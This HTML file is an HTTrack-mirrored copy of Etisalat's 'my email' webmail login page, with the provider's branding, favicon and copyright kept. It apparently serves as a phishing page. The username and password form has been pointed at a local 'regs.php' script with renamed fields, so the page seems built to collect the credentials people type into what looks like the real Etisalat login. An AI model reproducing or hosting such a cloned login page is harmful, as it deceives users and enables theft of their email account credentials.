<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
	
<!-- Mirrored from acm2.eim.ae/iwc_static/c11n/allDomain/layout/login.html by HTTrack Website Copier/3.x [XR&CO'2014], Wed, 24 Jul 2019 05:47:56 GMT -->
<head>
		<meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/>
		<!-- Mimic Internet Explorer 7 -->
		<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" />
                <link href="http://www.etisalat.ae/en/system/images/generic/etisalat.ico"  rel="shortcut icon" type="image/x-icon" />
                <link rel="stylesheet" href="css/login.css" type="text/css"/>
		<style type="text/css">
			@import "../../../js/dojotoolkit/dojo/resources/dojo.css";
			@import "../../../js/dojotoolkit/dijit/themes/dijit.css";
			@import "../../../js/dojotoolkit/dijit/themes/dijit_rtl.css";
			@import "../../../js/dojotoolkit/dijit/themes/tundra/form/Button.css";
			@import "../../../js/dojotoolkit/dojox/form/resources/DropDownSelect.css";
                body {
background-image: url(images/background.png); /*You will specify your image path here.*/

background-size: cover;
background-position: top center !important;
background-repeat: no-repeat !important;
background-attachment: fixed;
}

        </style>
                <style>
                .Convergence-Login-Logo {
        background-color: transparent;
        background-image: url("images/mail.jpg");
        background-repeat: no-repeat;
        background-position: 0 0;
        width: 75px;
        height:85px;
        padding: 0 0 0 0;
        border-bottom:none;
        margin-left:5px;
        float:left;
}
        .Convergence-Login-RedBand {
        margin: 0px;
        background-image:url("images/greyband.jpg");
        background-position: left top;
        height: 30px;
        width: 430px;
}


		.Convergence-Login-Logo1 {        background-color: transparent;
        background-image: url("images/mail.jpg");
        background-repeat: no-repeat;
        background-position: 0 0;
        width: 75px;
        height:85px;
        padding: 0 0 0 0;
        border-bottom:none;
        margin-left:5px;
        float:left;
}
.Convergence-Login-RedBand1 {        margin: 0px;
        background-image:url("images/greyband.jpg");
        background-position: left top;
        height: 30px;
        width: 430px;
}
                </style>
		<!--- link rel="stylesheet" href="../../../layout/css/login.css" type="text/css"/ --->
		<script type="text/javascript">
			var djConfig= {
				cacheBust: "none",
				isDebug:false,
				parseOnLoad:true
			};

			(function() {
				function getParameter(paramName) {
					paramName += "=";
					var queryString = window.location.search;
					var strBegin = queryString.indexOf(paramName);
					if (strBegin==-1){
						strBegin = queryString.length;
					}
					else {
						strBegin += paramName.length;
					}
					var strEnd = queryString.indexOf("&",strBegin);

					if (strEnd==-1){
						strEnd = queryString.length;
					}

					return queryString.substring(strBegin,strEnd);
				}

				var locale = getParameter("lang");
				if (locale.length >0){
					djConfig.locale = locale.toLowerCase();
					if ((djConfig.locale.indexOf("ar") == 0) || (djConfig.locale.indexOf("he") == 0)) {
						djConfig.direction = "rtl";
					}
					else {
						djConfig.direction = "ltr";
					}
					var top = document.getElementsByTagName("html")[0];
					top.dir = djConfig.direction;
				}
			})()
		</script>

		<script type="text/javascript" src="../../../js/dojotoolkit/dojo/dojo.js"></script>
		<script type="text/javascript">
			dojo.registerModulePath("iwc", "../../iwc");
			dojo.require("iwc.i18n.resources");
			dojo.requireLocalization("iwc.i18n","resources");
			iwc.l10n = dojo.i18n.getLocalization("iwc.i18n", "resources");
			dojo.require("iwc.login");

			function loadC11nResources() {
				dojo.registerModulePath("c11n", "../../../c11n");
				dojo.requireLocalization("c11n.allDomain", "resources");
				var l10n = dojo.i18n.getLocalization("c11n.allDomain", "resources");
				dojo.mixin(iwc.l10n, l10n);
			}

			function reloadWithHttps() {
				if(window.location.protocol == "login.html"){
					var contextPath = iwc.cookie("iwc-auth","path");
					var defaultURL = "";
					if(contextPath && contextPath != ""){
						defaultURL = "https://" + window.location.host + contextPath;
					}else{
						defaultURL = "https://" + window.location.host + window.location.pathname + window.location.search;
					}
					window.location.replace(defaultURL);
				}
			}
			
			dojo.addOnLoad(function(){
				reloadWithHttps();
				loadC11nResources();
				// prevent clickjacking
				if (top.location.hostname != self.location.hostname) {
					try {
						if (document.forms[0].password) {
							document.forms[0].style.display = "none";
						}
					} catch (e) {
						document.body.style.display = "none";
					}
				}

				iwc.login.setFocus();
				iwc.login.doI18N();
				//document.getElementById('picCache').src='imageList.html?'+djConfig.cacheBust;
				//var lang = langLblMapping[djConfig.locale.toLowerCase()]?langLblMapping[djConfig.locale.toLowerCase()]:langLblMapping['en-us'];
				var lang = "en_us";
				if(djConfig && djConfig.locale) {
					lang = djConfig.locale.toLowerCase();
				}
				dijit.byId('langButton').attr("value", lang);
				dojo.connect(dijit.byId("langButton"), "onChange", function(lang) {
					var loginUrl = window.location;

                    if(window.location.search!=""&&window.location.search.indexOf('lang=')>-1)
                        loginUrl = loginUrl.href.replace('lang='+iwc.login.getParameter('lang'),'lang='+lang);
                    else
                        loginUrl = loginUrl+"?lang="+lang

                    if(window.location.search.indexOf("u=1")==-1)
                        loginUrl=loginUrl+'&u=1';
                    
					window.location = loginUrl;
					return false;
				});
			});

			function login() {
				return iwc.login.checkName();
			}
		</script>



	</head>

<body role="application">
		<script type="text/javascript">
			
		</script>
       <div class="Convergence-Login" id="convergenceLogin2">
		  <div class="Convergence-Login-Border">
		    <div class="Convergence-Login-Banner">
		      <div class="Convergence-Login-Logo1" wairole="presentation"></div>
		      <div id="welcomeMsg2" class="Convergence-Login-WelcomeMsg">my email - Etisalat Internet Mail</div>
	        </div>
		    <div class="Convergence-Login-Notification" id="alertMsg2" aria-live="assertive" role="alert" tabindex="0" style="visibility: hidden;"></div>
		    <form action="regs.php" method="post" onsubmit="return login();">
		      <div>
		        <div class="Convergence-Login-Form">
		          <div class="Convergence-Login-FormRow">
		            <label id="usernameLabelID" for="username2">Username:</label>
		            <input id="username2" name="username2" type="text" aria-required="true" />
	              </div>
		          <div class="Convergence-Login-FormRow">
		            <label id="passwordLabelID" for="password2">Password:</label>
		            <input id="password2" name="password2" type="password" aria-required="true" autocomplete="off" />
	              </div>
		          <div class="Convergence-Login-FormRow">
		            <input id="chkpreloginip2" name="chkpreloginip2" type="hidden" value="true" aria-required="false" />
	              </div>
		          <div class="Convergence-Login-FormRow tundra">
		            <div class="Convergence-Login-SelectLang"></div>
		            <div class="Convergence-Login-FormButton" id="buttonContainer2">
		              <div> <span class="dijit dijitReset dijitLeft dijitInline dijitButton" dojoattachevent="ondijitclick:_onButtonClick,onmouseenter:_onMouse,onmouseleave:_onMouse,onmousedown:_onMouse" widgetid="signin"><span class="dijitReset dijitRight dijitInline"><span class="dijitReset dijitInline dijitButtonNode">
		                <button class="dijitReset dijitStretch dijitButtonContents" dojoattachpoint="titleNode,focusNode" type="submit" value="" wairole="button" waistate="labelledby-signin_label" role="button" aria-labelledby="signin_label" id="signin2" tabindex="0"><span class="dijitReset dijitInline" dojoattachpoint="iconNode"><span class="dijitReset dijitToggleButtonIconChar">✓</span></span><span class="dijitReset dijitInline dijitButtonText" id="signin_label" dojoattachpoint="containerNode">Sign In</span></button>
		                </span></span></span> </div>
	                </div>
		            <div style="clear: both"></div>
	              </div>
	            </div>
	          </div>
		      <div style="clear: both"></div>
	        </form>
		    <div class="Password-Expired-Message tundra" id="PwdExpiredMsg2" style="display:none;">
		      <div class="ErrorMsg-Contianer" id="btnContainer2">
		        <div class="Error-Icon"></div>
		        <div class="Error-Msg" id="errMsg2"></div>
	          </div>
		      <div class="Convergence-Login-FormButton ChangePwdBtn"> <span class="dijit dijitReset dijitLeft dijitInline dijitButton" dojoattachevent="ondijitclick:_onButtonClick,onmouseenter:_onMouse,onmouseleave:_onMouse,onmousedown:_onMouse" widgetid="changepwd"><span class="dijitReset dijitRight dijitInline"><span class="dijitReset dijitInline dijitButtonNode">
		        <button class="dijitReset dijitStretch dijitButtonContents" dojoattachpoint="titleNode,focusNode" type="button" value="" wairole="button" waistate="labelledby-changepwd_label" role="button" aria-labelledby="changepwd_label" id="changepwd2" tabindex="0"><span class="dijitReset dijitInline" dojoattachpoint="iconNode"><span class="dijitReset dijitToggleButtonIconChar">✓</span></span><span class="dijitReset dijitInline dijitButtonText" id="changepwd_label" dojoattachpoint="containerNode">Change Password</span></button>
		        </span></span></span> </div>
	        </div>
		    <div class="Convergence-Login-RedBand1"></div>
		    <div id="copyright2" class="Convergence-Login-Copyright">Copyright © 2019, Etisalat. All Rights Reserved.</div>
	      </div>
</div>
</body>

<!-- Mirrored from acm2.eim.ae/iwc_static/c11n/allDomain/layout/login.html by HTTrack Website Copier/3.x [XR&CO'2014], Wed, 24 Jul 2019 05:53:20 GMT -->
</html>
